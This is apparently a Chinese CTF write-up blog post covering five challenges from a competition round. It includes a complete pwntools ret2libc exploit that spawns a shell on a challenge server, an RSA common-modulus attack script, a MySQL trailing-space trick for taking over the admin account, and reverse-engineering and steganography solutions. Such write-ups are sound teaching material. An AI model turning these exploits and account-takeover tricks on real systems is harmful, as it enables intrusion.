ZoE

极客巅峰赛第二场

发表于 更新于 分类于 阅读次数:

极客巅峰赛第二场

pwn------PlainR2B

最简单的栈溢出,其中要注意的就是strcmp对比是以\x00为标志结束的,read这么0x34个字节,0x1c+8个字节就到ret地址,详细见exp。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
from pwn import *

context(os='linux',arch='amd64',aslr = 'False')
local = 0
#log_level='debug'
if local:
	p = process("./pwn",env={'LD_PRELOAD':'./libc-2.23.so'})
	elf = ELF("./pwn")
	libc = ELF('./libc-2.23.so')
else:
	p = remote('117.50.60.184',12345)
	#p = remote('chall.pwnable.tw',10001)
	elf = ELF("./pwn")
	libc = ELF('./libc-2.23.so')


printf_plt = 0x8048460
printf_got = 0x804A018


p.sendline("AAA")
pause()
payload = "yes"+"\x00"*(28-3) + "\x00"*4 
payload += p32(printf_plt) + p32(0x80485CB) + p32(printf_got)
payload += "\x00"* (0x34 - len(payload))
p.send(payload)

p.recvuntil("true?")
printf = u32(p.recvn(4))
print hex(printf)
libc_printf = libc.symbols['printf']
libc_base = printf - libc_printf
print hex(libc_base)

system_addr = libc_base + libc.symbols['system']
binsh_addr = libc_base + next(libc.search('/bin/sh'))

payload = "yes"+"\x00"*(28-3) + "\x00"*4 
payload += p32(system_addr) + p32(0x80485CB) + p32(binsh_addr)
payload += "\x00"* (0x34 - len(payload))
p.sendline("aaa")
p.send(payload)

p.interactive()

re------Antidbg

这题有IDA7.1的话就比较简单,可以直接F5。或者其中有一个地方把栈帧提高了0x100,IDA里面把他改成0就可以F5了。
然后还有一个坑就是,直接main里面进去的那个数组看到的是四个2,但是其实创建一个新线程的那个函数里面有一个判断会把那个数组里面的四个2变成2,3,6,7。
剩下就是直接爆破就OK了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
v5=[0x06, 0x0C, 0x01, 0x07, 0x0B, 0x00, 0x06, 0x02, 0x01, 0x06, 0x01, 0x07, 0x02, 0x0D, 0x05, 0x01,0x03, 0x03, 0x0D, 0x04, 0x03, 0x01, 0x00, 0x0D, 0x08, 0x08, 0x01, 0x02, 0x0D, 0x07, 0x00, 0x01,0x02,0x06,8,2,9,0,5,2,2,0xd]

b=[2,2,2,2,3,1,1,2,1,1,2,1,1,0,1,1,2,2,0,1,1,1,1,0,1,1,2,2,0,1,1,2,2,1,1,1,1,1,2,1,1,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
d=[2,3,6,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]

res=[]
dd=[0,1,2,3,4,5,6,7,8,9,0xa,0xb,0xc,0xd,0xe,0xf]

for j in range(42):
	a=0
	for i in range(256):
		if (i >> 4) == d[b[j]] and (i & 0xF) == dd[v5[j]] :
			res.append(i)
			#print chr(i)
			# print i
			a=1
			break
	if a==0 :
		print "erro"
		break
s=''
for i in range(42):
	s=s+chr(res[i])
print s

crypto----RSA

这道题是一个共模攻击,利用两个文件的n是一样的,只有e不一样,但是这两个e是互素的,就一定存在一个a,b使得乘积为1。

参考链接:https://www.jianshu.com/p/9b44512d898f

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
from libnum import *
import base64
from binascii import *
from Crypto.PublicKey import RSA
from Crypto.Util.number import *


c1 = int(hexlify(base64.b64decode(open("flag1.enc").read())),16)
c2 = int(hexlify(base64.b64decode(open("flag2.enc").read())),16)
key1 = RSA.importKey(open("pubkey1.pem").read())
key2 = RSA.importKey(open("pubkey2.pem").read())

e1 = key1.e
e2 = key2.e

n = key1.n
c1_invert = (xgcd(c1, n)[0]+n)%n
f = (pow(c1_invert , -xgcd(e1,e2)[0], n)*pow(c2, xgcd(e1,e2)[1],n))%n
print unhexlify(hex(f)[2:].strip("L"))

WEB-----simple sqli

这题目也算是够坑的了,说是sqli其实就没有sql注入,其实就是一个简单的mysql特性的问题。先创建一个admin用户,名字只要用admin(后面加几个空格),就可以把admin这个用户覆盖掉,然后登陆就可以拿到flag

misc ---- word

最简单的misc隐写题目,又是一波关注公众号,然后word文档里面的字体名字就是后面的flag。